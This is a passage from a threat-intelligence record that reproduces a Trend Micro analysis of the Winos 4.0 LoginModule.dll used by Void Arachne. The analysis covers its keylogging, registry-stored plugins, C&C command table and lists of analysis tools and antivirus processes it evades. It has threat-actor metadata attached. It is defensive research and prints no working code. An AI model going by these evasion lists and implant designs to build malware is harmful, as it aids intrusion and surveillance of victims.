KB (199680 bytes)\r\nType DLL\r\nThe 登录模块.dll (LoginModule.dll) is a fundamental component of Winos 4.0, serving as the core plugin manager for the\r\nsystem. This module is responsible for handling every action and command executed by the operator, which are transmitted\r\nvia the C\u0026C server as DLL plugins. These plugins extend the functionality of the implant.\r\nUpon receiving the response from the C\u0026C server, the implant stores these DLL plugins in the Windows registry paths\r\nHKEY_CURRENT_USER\\Console\\0 for 32-bit systems or HKEY_CURRENT_USER\\Console\\1 for 64-bit systems.\r\nSubsequently, the implant loads and uses these plugins to perform various tasks, enhancing its operational capabilities. This\r\nmodular approach allows for a highly flexible and extensible framework, enabling the efficient execution of diverse\r\nfunctions as required by the operator.\r\nOnce the 登录模块.dll (LoginModule.dll) plugin is downloaded, the execution of this module is based on the previously\r\nmentioned configuration. The malware creates a thread to collect clipboard data and keystrokes. It also employs a specific\r\nmutex for this thread, which is named 测试备注  (Test Notes).\r\nFigure 36. Code that shows mutex creation and clipboard data retrieval\r\nNext, the malware chooses one of the three available C\u0026C configurations. Before initiating the socket, it checks whether the\r\nantianalysis feature is configured to run. If this feature is configured, the malware verifies the presence of monitoring\r\nsoftware by inspecting the window titles of running processes. If such software is detected, the malware enters sleep mode.\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 23 of 30\n\nFigure 37. Initializing socket with the C\u0026C server\r\nBelow is a list of monitoring software that the malware detects:\r\n流量（Flow）             \r\nTaskExplorer\r\nWireshark\r\nFiddler\r\nProcess\r\nApateDNS\r\nCurrPorts\r\n任务管理器（Task manager）\r\n火绒（Tinder）\r\n提示符（Prompt）\r\nMalwarebytes\r\nPort\r\n资源监视器（Resource monitor）\r\nCapsa\r\nTCPEye\r\nMetascan\r\n网络分析（Network analysis）\r\nSniff\r\nThe malware collects system information from an infected machine, including the IP address, computer name, antivirus\r\nsoftware, operating system details, and hardware ID (HWID).\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 24 of 30\n\nFigure 38. System information-gathering code snippet\r\nTable 6 shows a list of targeted antivirus (AV) software.\r\nAV vendor Targeted AV process\r\n360 Total Security 360Safe.exe | 360Tray.exe | 360tray.exe | ZhuDongFangYu.exe | 360sd.exe\r\n金山（Jinshan） Kxetray.exe | KSafeTray.exe | kscan.exe | kwsprotect64.exe | kxescore.exe\r\nQQ\r\nQQPCRTP.exe | QMDL.exe | QMPersonalCenter.exe | QQPCPatch.exe |\r\nQQPCRealTimeSpeedup.exe | QQPCTray.exe | QQRepair.exe\r\nBaidu BaiduSd.exe | baiduSafeTray.exe\r\n江民（Jiang Min） KvMonXP.exe | RavMonD.exe\r\nQuickHeal QUHLPSVC.EXE\r\nMicrosoft MSE mssecess.exe\r\nComodo cfp.exe\r\nDR.WEB SPIDer.exe\r\nOutpost acs.exe\r\n安博士V3 （Dr. An\r\nV3）\r\nV3Svc.exe\r\n韩国胶囊（Korean\r\ncapsules）\r\nAYAgent.aye\r\nAVG avgwdsvc.exe\r\nF-Secure f-secure.exe\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 25 of 30\n\n卡巴（Kaba） avp.exe\r\n  avpui.exe\r\nMcAfee Mcshield.exe\r\nNOD32 egui.exe\r\n可牛（Ke Niu） knsdtray.exe\r\nTrend Micro TMBMSRV.exe\r\n小红伞（Red\r\nUmbrella）\r\navcenter.exe\r\nNorton rtvscan.exe\r\nAvast ashDisp.exe\r\nPanda Antivirus\r\nTitanium\r\nremupd.exe\r\nBitDefender vsserv.exe\r\nPSafe PSafeSysTray.exe\r\nAd-watch ad-watch.exe\r\nK7 K7TSecurity.exe\r\nUnThreat UnThreat.exe\r\nTable 6. List of targeted antivirus software\r\nNext, the malware employs the encryption algorithm that we’ve previously discussed to encrypt all collected data. Using the\r\ntimeGetTime() Windows API function, a new key will be generated to encrypt the collected data, which is different from the\r\nkey used during the stager’s initial request. The malware appends the hardcoded value “06 00” to the encryption key to\r\nindicate that this request contains collected data. Unlike the stager, LoginModule.dll doesn’t send the key in a separate\r\nrequest, instead, it prefixes the value of the key to the collected data and sends this encrypted request to the C\u0026C server. \r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 26 of 30\n\nFigure 39. Code snippet showing the encryption and transmission of collected information to the C\u0026C server\r\nFigure 40 shows the initial packet that the malware sends.\r\nFigure 40. Initial packet sent by登录模块.dll (LoginModule.dll)\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 27 of 30\n\nFigure 41.登录模块.dll (LoginModule.dll) decrypted initial traffic\r\nThe malware then begins to listen for incoming commands from the C\u0026C server. It can execute a variety of tasks, including\r\nloading additional plugins, capturing screenshots, and clearing system logs. These functions are managed and executed\r\nthrough controlled switch statements, ensuring precise and efficient handling of each instruction.\r\nTable 7 lists the malware’s supported functionalities.\r\nCommands Description\r\n0 Load plugins\r\n1 Load the plugin and update the registry\r\n2 Terminate the connection\r\n3 Send the active window information and capture a screenshot\r\n4 Capture a screenshot\r\n5 Execute file and commands\r\n6 Download a file from the given URL and execute it\r\n7 Modify the registry value of specific keys and, if the key doesn’t exist, create it\r\n8\r\nCheck whether a process with the provided name exists on the system by enumerating the list of running\r\nprocesses\r\n9 N/A\r\n10 Capture a  screenshot\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 28 of 30\n\n11 Clear system logs: Application, security, and system\r\n12 Restart the process\r\n13 Terminate the process\r\n14 Logout from the system\r\n15 Restart the system\r\n16 Shutdown the system\r\n17 Change the default plugin loading method\r\n18 Update configuration settings\r\n19 Create a new C\u0026C thread and perform system information collection\r\n100 Set the value of IpDatespecial registry\r\n101 Remove the value of IpDatespecial registry\r\nTable 7. A list of the malware’s supported functionalities\r\nConclusion\r\nIn the scope of our research, we conducted an analysis of a Void Arachne campaign that targets the Chinese-speaking\r\ndemographic. Using SEO poisoning and widely used messaging applications such as Telegram, the Void Arachne threat\r\ngroup has potentially reached a substantial Chinese-speaking demographic as well as the broader East Asian community\r\nthrough the dissemination of malicious MSI files.\r\nAs is the case with Void Arachne’s campaign, threat actors abused the great public interest in AI technologies to deliver\r\nmalware. Our investigation revealed that Void Arachne promoted compromised MSI files embedded with nudifiers and\r\ndeepfake pornography-generating software, intending to infect unsuspecting users. Furthermore, the group advertised\r\ncorrupted AI voice and facial technologies, frequently exploited in virtual kidnapping schemes. The proliferation of these\r\nartificial technologies has prompted concerns regarding potential misuse, particularly evident in sextortion and virtual\r\nkidnapping schemes that can lead to heartbreaking consequencesnews article. In its commitment to safeguarding the general\r\npublic’s online well-being, Trend Micro has curated comprehensive resources designed to educate the community on\r\nidentifying, preventing, and addressing sextortion attacks. In the event of falling victim to sextortion or virtual kidnapping,\r\nthe prompt reporting of the incident to relevant authorities, such as the Internet Crime Complaint Center (IC3), is strongly\r\nrecommended.\r\nThroughout 2024, we have seen an increase in malicious MSI files, such as in a DarkGate campaign that exploited the\r\nMicrosoft Windows Internet Shortcut SmartScreen Bypass Vulnerability (CVE-2024-21412). Individuals are strongly\r\nadvised to check the source of MSI files and only download them from trusted sources. As previously discussed, MSI files\r\nare bundled installers, which mean that malicious software as well as zero-day exploits can be bundled alongside legitimate\r\nsoftware. These malicious MSI files pose a significant threat to organizations as they may act as a backdoored installer and\r\npoison the software installer supply chain.\r\nOrganizations can protect themselves from these kinds of attacks with Trend Vision Oneone-platform, which enables\r\nsecurity teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets.\r\nVision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors,\r\nsuch as the likelihood and impact of potential attacks, and offers a range of prevention, detection, and response capabilities.\r\nThis is all backed by advanced threat research, threat intelligence, and AI, which helps reduce the time taken to detect,\r\nrespond, and remediate issues. Ultimately, Trend Vision One can help improve the overall security posture and effectiveness\r\nof an organization, including defending an organization against zero-day attacks.\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 29 of 30\n\nWhen faced with uncertain intrusions, behaviors, and routines, organizations should assume that their system is already\r\ncompromised or breached and work to immediately isolate affected data or toolchains. With a broader perspective and rapid\r\nresponse, organizations can address breaches and protect their remaining systems, especially with technologies such as\r\nTrend Micro™ Endpoint Securityopen on a new tab™ and Trend Micro Network Security, as well as comprehensive\r\nsecurity solutions such as Trend Micro™ Security Operationsopen on a new tab, which can detect, scan, and block malicious\r\ncontent across the modern threat landscape.\r\nThe complete list of indicators of compromise (IoCs) can be found here. \r\nSource: https://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 30 of 30",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html"
	],
	"report_names": [
		"behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8f68387a-aced-4c99-b2a6-aa85071a0ca3",
			"created_at": "2024-06-25T02:00:05.030976Z",
			"updated_at": "2026-04-10T02:00:03.656871Z",
			"deleted_at": null,
			"main_name": "Void Arachne",
			"aliases": [
				"Silver Fox"
			],
			"source_name": "MISPGALAXY:Void Arachne",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a7805d1a-b8d0-4a42-ae86-1d8711e0b2b9",
			"created_at": "2024-08-28T02:02:09.729503Z",
			"updated_at": "2026-04-10T02:00:04.967533Z",
			"deleted_at": null,
			"main_name": "Void Arachne",
			"aliases": [
				"Silver Fox"
			],
			"source_name": "ETDA:Void Arachne",
			"tools": [
				"Gh0stBins",
				"Gh0stCringe",
				"HoldingHands RAT",
				"Winos"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434712,
	"ts_updated_at": 1775791746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/559df6500e93585b43c1e49e675474634efd3d61.pdf",
		"text": "https://archive.orkl.eu/559df6500e93585b43c1e49e675474634efd3d61.txt",
		"img": "https://archive.orkl.eu/559df6500e93585b43c1e49e675474634efd3d61.jpg"
	}
}